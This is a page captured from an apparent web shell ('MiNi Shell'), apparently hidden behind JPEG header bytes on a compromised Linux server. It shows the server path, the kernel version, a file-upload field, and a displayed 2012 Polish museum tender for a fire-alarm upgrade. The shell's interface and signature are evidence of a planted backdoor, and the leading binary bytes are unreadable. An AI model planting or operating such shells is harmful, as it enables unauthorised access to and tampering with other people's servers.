JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120919/200989-N-2012.html

<p class="kh_header"><b>Nowy Sącz: Wykonanie  modernizacji sytemu alarmu pożaru w Sądeckim Parku Etnograficznym w Nowym Sączu,  ul. Długoszowskiego 83b</b><br>
<b>Numer ogłoszenia: 200989 - 2012; data zamieszczenia: 19.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Okręgowe w Nowym Sączu , ul. Lwowska 3, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4437708, faks 018 4437865.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.muzeum.sacz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury Województwa Małopolskiego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie  modernizacji sytemu alarmu pożaru w Sądeckim Parku Etnograficznym w Nowym Sączu,  ul. Długoszowskiego 83b.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest:
Wykonanie prac związanych ze zmianą organizacji pętli dozorowych systemu alarmu pożaru na obszarze Sądeckiego Parku Etnograficznego obejmującym 50 obiektów zabytkowych architektury drewnianej, polegających na:
1.1.	Utworzeniu 6 linii dozorowych z istniejących 3 o dł. Ok. 4 000 mb
1.2.	Montażu centrali sygnalizacji alarmu pozaru /SAP/ Polon 4900
1.3.	Połączeniu komunikacji nowej centrali z istniejącą Polon 4000 za pomocą 
        istniejącego kabla sygnalizacyjnego
1.4.	Przystosowaniu istniejącej centrali Polon 4000 do współpracy z projektowaną 
        centralą
1.5.	Wciągnięciu kabla XzKSLw ekw. 1x2x1,5 do kanalizacji teletechnicznej - 615 mb
1.6.	Wymianie czujek Dio 37 na Dio 4046 szt.28
1.7.	Ułożeniu przewodu YnTKSY ekw 2x1x1 - 208 mb, w rurze RLHF 16
1.8.	Wymianie czujek Dio 4046 szt.40 
1.9.	Demontażu centrali Ignis 1080
1.10.	Dostawie komputera z oprogramowaniem do wizualizacji systemu alarmu pożaru
         i podłączeniu do istniejącej centrali Polon 4000
1.11.	Programowaniu centrali
1.12.	Sporządzeniu dokumentacji powykonawczej
1.13.	Szkoleniu obsługi
2.Szczegółowy zakres - opis przedmiotu zamówienia określają przedmiary robót  stanowiące załącznik nr 4 do specyfikacji, oraz projekt wykonawczy do wglądu lub odbioru za potwierdzeniem, wg. załączonego wzoru  według załącznika nr 6. 
3.W celu lepszego zapoznania się z przedmiotem zamówienia Zamawiający zaleca dokonanie przez wykonawcę (na własny koszt, ryzyko i odpowiedzialność) wizji lokalnej w terenie robót oraz zdobycia wszelkich informacji, które mogą być konieczne do przygotowania oferty. 
4.Miejsce wykonania zamówienia: Polska, woj. małopolskie, miasto Nowy Sącz ul. Długoszowskiego 83b
5.Podane w dokumentacji nazwy materiałów, urządzeń i sprzętu mają znaczenie przykładowe i Wykonawca może stosować materiały, urządzenia i sprzęt równoważne, dopuszczone do stosowania na obszarze RP. Przez materiały lub urządzenia równoważne Zamawiający rozumie materiały lub urządzenia posiadające równorzędne lub wyższe parametry techniczne i jakościowe jak wskazane przez Zamawiającego.
6.Roboty należy wykonywać zgodnie z obowiązującymi przepisami budowlanymi, obowiązującymi normami oraz zasadami wiedzy technicznej, w sposób nie zagrażający bezpieczeństwu ludzi i mienia.
7.Wykonawca zobowiązuje się wykonać przedmiot umowy z materiałów, sprzętu i urządzeń własnych.
8.	Zamawiający wymaga 3 letniego okresu odpowiedzialności Wykonawcy za wady rękojmi i gwarancji jakości licząc od dnia podpisania protokołu odbioru końcowego przedmiotu umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego do wysokości 5 % zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.31.21.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie przedłożonych uwierzytelnionych dokumentów potwierdzających uprawnienia uprawnienia do montażu jonizacyjnych czujek dymu: /ustawa z dnia 29 listopada 2000 r. Prawo atomowe - tekst jednolity ( Dz. U. z 2012r.264);
2) posiadali ukończony kurs z zakresu zabezpieczenia obiektów muzealnych organizowanych przez Ośrodek Ochrony Zbiorów Publicznych w myśl  rozporządzenia Min. Kultury i Dziedzictwa Narodowego z dnia 01.12.2008 r. ( Dz. U. nr 229. poz.1528)
3) dysponowali osobami posiadającymi następujące uprawnienia
   a) kierownik robót winien posiadać stwierdzenie przygotowania zawodowego w zakresie instalacji elektrycznych do kierowania i nadzorowania budowy i robót oraz uprawnienia SEP -D-
b) osoby wykonujące instalacje winny posiadać:
      -uprawnienia SEP  -E -
      -licencje pracownika zabezpieczenia technicznego uprawniająca do montażu elektronicznych urządzeń i systemów alarmowych -Ustawa o ochronie osób i mienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena nastąpi na podstawie przedłożonej jednej  referencji wykonanych co najmniej jednej roboty budowlanej w obiekcie zabytkowym drewnianym wpisanym do rejestru zabytków o  wartości nie mniejszej niż 50 000 zł. w okresie ostatnich pięciu lat przed dniem wszczęcia  postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym  okresie, odpowiadających swoim rodzajem  stanowiącym przedmiot zamówienia, z podaniem daty i  miejsca wykonania, a ocena spełnienia warunku nastąpi na podstawie dokumentów   potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo    ukończone .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ne  dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.W celu uczestniczenia w postępowaniu Wykonawca powinien przedłożyć ofertę, której wzór stanowi załącznik nr 1 do SIWZ. 
2.W celu wykazania spełnienia warunków udziału w postępowaniu, każdy z Wykonawców ma obowiązek przedłożyć wraz z ofertą następujące oświadczenia i dokumenty:
1)	oświadczenia o spełnieniu warunków udziału w postępowaniu, którego wzór stanowi  załącznik nr 2 do SIWZ;
2)oświadczenia o braku podstaw do wykluczenia, którego wzór stanowi załącznik nr 3 do  SIWZ; 
3)wykaz zamówień spełniający warunki określone w Rozdziale V ust. 2 , którego wzór
 stanowi załącznik nr 7 do SIWZ; 
4)referencje Zamawiającego potwierdzające, że zamówienia wykonane i wykazane w
  załączniku nr 7 do SIWZ  zostały wykonane należycie;
5)aktualny odpis z właściwego rejestru - w stosunku do Wykonawców co do których odrębne    przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia,  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3.Na potwierdzenie warunków określonych w Rozdziale V specyfikacji ust.2 pkt. 1, 2, 3 należy przedłożyć uwierzytelnione dokumenty potwierdzające uprawnienia realizujących Zamówienie: 
1)dla przedstawiciela wykonawcy
 - uprawnienia  z zakresu zabezpieczenia obiektów muzealnych organizowanych przez Ośrodek    Ochrony Zbiorów Publicznych
2)   dla kierownika robót 
   -  uprawnienia budowlane w zakresie instalacji elektrycznych do  kierowania i nadzorowaniu budowy i  robót
              - oraz uprawnienia SEP - D
3) dla osób wykonujących montaż :
             -  uprawnienia do montażu jonizacyjnych czujek dymu
      -  uprawnienia SEP - E 
      -   licencje pracownika zabezpieczenia technicznego uprawniająca do montażu elektronicznych  urządzeń i systemów alarmowych. 
4.	Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia, którego wzór stanowi załącznik nr 1b) do SIWZ, aktualny odpis z właściwego rejestru - w stosunku do Wykonawców co do których odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert  a także przedstawienia pisemnego zobowiązanie tych podmiotów do oddania mu do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Zamawiający żąda także spełnienia przez te podmioty warunków podanych w ust. 3 w zw. Z Rozdz. V ust. 2 pkt. 1) - 3).
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, Wykonawca składa wymagany dokument lub dokumenty zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12. 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form w jakich te dokumenty mogą być składane -Dz. U. Nr 226, poz.1817-  zamiast aktualnego odpisu z rejestru w stosunku do Wykonawców co do których odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia, Wykonawca składa dokument lub dokumenty wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
2)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
albo dokument o którym mowa w § 4 ust. 3 ww. Rozporządzenia.  
6.	Brak któregokolwiek z wymaganych oświadczeń, dokumentów i próbek o których mowa w art. 25 ustawy, lub pełnomocnictw, a także ich nie uzupełnienie lub nie wyjaśnienie w terminie postawionym przez Zamawiającego w wezwaniu, o którym mowa w art. 26 ust. 3 ustawy, będzie skutkować wykluczeniem Wykonawcy z postępowania. Zamawiający wykluczy z postępowania Wykonawcę także, jeśli stwierdzi, że złożone dokumenty i próbki nie spełniają wymogów niniejszej specyfikacji, ustawy lub są nieprawdziwe.
7.	Oferta oraz oświadczenie, o których mowa w ust. 1 i 2 pkt. 1)  należy przedstawić w formie oryginału zaś pozostałe dokumenty należy przedstawić w formie oryginału lub kserokopii poświadczonej (każda zapisana strona) za zgodność z oryginałem przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na warunkach jak we Wzorcu umowy stanowiącym załącznik nr 5. do specyfikacji.
2.Złożenie oferty jest równoznaczne z akceptacją treści umowy.
3.W przypadku zmiany podatku VAT, na wniosek jednej ze stron wynagrodzenie umowne ulega zmianie o wielkość wynikającą ze zmiany podatku VAT. Zmiana dokonywana jest w formie aneksu.
4.W razie konieczności wykonania robót dodatkowych i zamiennych wynagrodzenie umowne ulega zmianie o wielkość wynikającą z zakresu i rodzaju wykonanych robót nie więcej jednak jak o 5%. Zmiana umowy dokonywana jest w formie aneksu. 
5.	Mimo wynagrodzenia ryczałtowego Strony ustalają, że w razie zmniejszenia dostawy tj. ilości, nakładu wydawnictwa wynagrodzenie ulega proporcjonalnemu zmniejszeniu. Wykonawca otrzyma wynagrodzenie za faktycznie dostarczone wydawnictwa po uwzględnieniu zmniejszenia nakładu i jest liczone jako wynik podzielenia wynagrodzenia za dany rodzaj wydawnictwa przez nakład - ilości wykazane w ofercie, a wynik pomnożony przez wykonany faktycznie nakład.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.muzeum.sacz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Okręgowe w Nowym Sączu ul. Lwowska 3
33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2012 godzina 09:00, miejsce: Muzeum Okręgowe w Nowym Sączu ul. Lwowska 3, 33 - 300 Nowy Sącz, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com